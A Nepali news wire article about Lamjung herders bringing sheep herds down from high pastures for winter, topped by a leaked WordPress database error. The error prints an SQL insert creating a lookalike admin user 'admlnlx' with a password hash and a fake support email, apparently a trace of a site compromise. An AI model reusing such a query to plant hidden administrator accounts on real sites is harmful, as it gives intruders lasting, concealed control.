WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BHxQcR5/94tAi7it8hl0i4r7uI5r7m1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 13:44:36', '', 'admlnlx', 'admlnlx')
बँेसीसहर (लमजुङ), पुस ११ –
हिउँदको चिसो सुरु भएसँगै लमजुङको हिमाली भेगमा राखिएका भेडीगोठ बेँसी झार्न थालिएको छ ।
चिसो बढ्न थालेपछि अहिले भेडीगोठ बस्ती नजिकैका डाँडामा सारिएको हो । पुख्र्यौली चलन र पेसा पहिले भन्दा केही घटेपनि लमजुङमा अझै भेडीगोठ छन् । अघिल्लो वर्षको तुलनामा यो वर्ष अलि पहिले नै भेडीगोठ बेँसी झारिएको हो । उत्तर–पश्चिम लमजुङका भेडीगोठ लमजुङ, मनाङ र कास्कीको सिमाना लमजुङ हिमालको काख दूधपोखरीस्थित थुर्जुलेकमा राखिन्थे ।
हाल लमजुङको भुजुङ, पसगाउ, सिङ्दी, घनपोखरा, ताघ्रिङ, घलेगाउँ लगायतका गाविसमा भेडीगोठ छन् । जिल्ला पशुसेवा कार्यलय लमजुङका अनुसार ती भेडीगोठमा १० हजारभन्दा बढी भेंडाबाख्रा रहेको अनुमान छ । लमजुङमा भेडीगोठ ६ महिना लेक र ६ महिना बेँंसीमा राख्ने गरिन्छ ।
प्रायः परिवारको कुनै एक सदस्य मात्रै भए पनि भेडीगोठमा बस्ने गर्छन् । भेडीगोठमा बस्दा जुकाले निकै सताउने ताघ्रिङका अमरजङ गुरुङ बताउनुहुन्छ । लेकमा बस्दा भेडीगोठसँगै भँैसी पनि राखिन्छ ।
लेकमा रहँदा भैँसीेले दिएको दूधबाट प्रशस्त घीउ, मोहीको रोटीलगायतका अन्य दूधको परिकार बनाउने गरिन्छ । हिउँदमा बँेसी झारिएका भेडागोठले खेतबारी मोल्ने काम गरिन्छ । अहिले बस्ती नजिक सारिएको भेडीगोठ पुनः वैशाख जेठदेखि लेकमा फर्काइन्छ ।
परम्परागत भेडीगोठ पछिल्लो समय दुर्लभ हुन पुगे पनि पर्यटकको आर्कषण भने बनिरहेको छ । लमजुङको उत्तरी भागमा रहेका भेडीगोठ हेर्न कै लागि पनि पर्यटक आउने गरेको पर्यटन व्यवसायी बताउँछन् ।
लमजुङका ग्रामीण भेगका बासिन्दाले भेंडापालन व्यवसाय अङ्गाल्दै आए पनि आधुनिक र व्यावसायिक रुप भने पाउन सकेको छैन । प्रशस्त घाँसे मैदानको खर्क हुँदा हुँदै पनि गोठाला र आधुनिक प्रविधिको अभावमा भएका भेडीगोठ पनि बिलाउँदै गएका हुन् ।
भेडापालन कम हँुदै गएकाले लमजुङको उच्च भेगमा रहेको राडीपाखी बुन्ने पेसा पनि विस्तारै सङ्कटमा पर्न थालेको छ । – रासस